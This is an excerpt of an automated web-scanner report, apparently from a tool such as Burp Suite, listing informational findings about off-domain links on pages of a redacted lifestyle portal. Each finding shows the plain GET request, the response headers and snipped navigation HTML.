</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&amp;form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Coats</a>
...[SNIP]...
<div id="subfoot"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.106. http://lifestyle.redacted/your-life/family-parenting/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/family-parenting/article.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=708c46c2de6a4adaa8f33981559353a2; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=151C902562754AB1AE9AA3C81E148BA9; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344847&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Ffamily-parenting%2Farticle.aspx%3Fcp-documentid%3D27352384%26gt1%3D32060&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.thebump.com?cm_mmc=TB-_-MSN-_-tb%20logo-_-none"><img src="http://blstb.redacted/i/E9/F0113365E35922B35C9826DE2BEA1.gif" width="80" height="30" alt="The Bump" />
...[SNIP]...
<li><a href="http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/fun-ways-to-lose-the-baby-weight.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-lose%20the%20baby%20weight">5 (fun!) ways to lose the baby weight</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/toddler.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-50%20things%20about%20toddler">50+ Things you didn't know about your toddler</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/five-moms-you-will-meet-online.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-8%20moms%20youll%20meet%20online">8 (annoying!) moms you'll meet online</a>
...[SNIP]...
<li><a href="http://community.thebump.com/cs/ks/forums/5039437/ShowForum.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-Chat%20with%20other%20new%20moms%20now">Chat with other new moms now</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/pregnancy-baby-message-boards.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-New%20dad">New dad? Read this</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&amp;OCID=TWT">Tweet</a>
...[SNIP]...
</script><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...
'1');" href="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&amp;gt1=32060&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
href="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&amp;gt1=32060&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS71"><span>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&amp;go=&amp;form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&amp;form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Coats</a>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle Facebook Page" shape="rect" coords="253,3,278,25" /><area href="http://twitter.com/MSNParenting" alt="MSN Parenting Twitter Page" shape="rect" coords="278,5,300,25" /></map>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.107. http://lifestyle.redacted/your-life/family-parenting/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/family-parenting/article.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a68ff5afcfc348358fbcb7b48949596c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=941BDD36E9DA49C3A9586D7B92749DAA; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406213&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Ffamily-parenting%2Farticle.aspx%3Fcp-documentid%3D27352384%26gt1%3D32060&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.thebump.com?cm_mmc=TB-_-MSN-_-tb%20logo-_-none"><img src="http://blstb.redacted/i/E9/F0113365E35922B35C9826DE2BEA1.gif" width="80" height="30" alt="The Bump" />
...[SNIP]...
<li><a href="http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/fun-ways-to-lose-the-baby-weight.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-lose%20the%20baby%20weight">5 (fun!) ways to lose the baby weight</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/toddler.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-50%20things%20about%20toddler">50+ Things you didn't know about your toddler</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/five-moms-you-will-meet-online.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-8%20moms%20youll%20meet%20online">8 (annoying!) moms you'll meet online</a>
...[SNIP]...
<li><a href="http://community.thebump.com/cs/ks/forums/5039437/ShowForum.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-Chat%20with%20other%20new%20moms%20now">Chat with other new moms now</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/pregnancy-baby-message-boards.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-New%20dad">New dad? Read this</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&amp;OCID=TWT">Tweet</a>
...[SNIP]...
</script><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...
'1');" href="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&amp;gt1=32060&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
href="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&amp;gt1=32060&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS71"><span>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&amp;go=&amp;form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&amp;form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Coats</a>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle Facebook Page" shape="rect" coords="253,3,278,25" /><area href="http://twitter.com/MSNParenting" alt="MSN Parenting Twitter Page" shape="rect" coords="278,5,300,25" /></map>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.108. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/new-year-new-you/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-life/new-year-new-you/video.aspx?vid=416830b2-ec67-4155-ba51-efe3faacecec&from=en-us_msnhp&gt1=32094 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:10 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fad6b51d1d684b029b52f6463e614c4e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B3E6416FBEF54EF3B255704B0710CF42; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:10 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
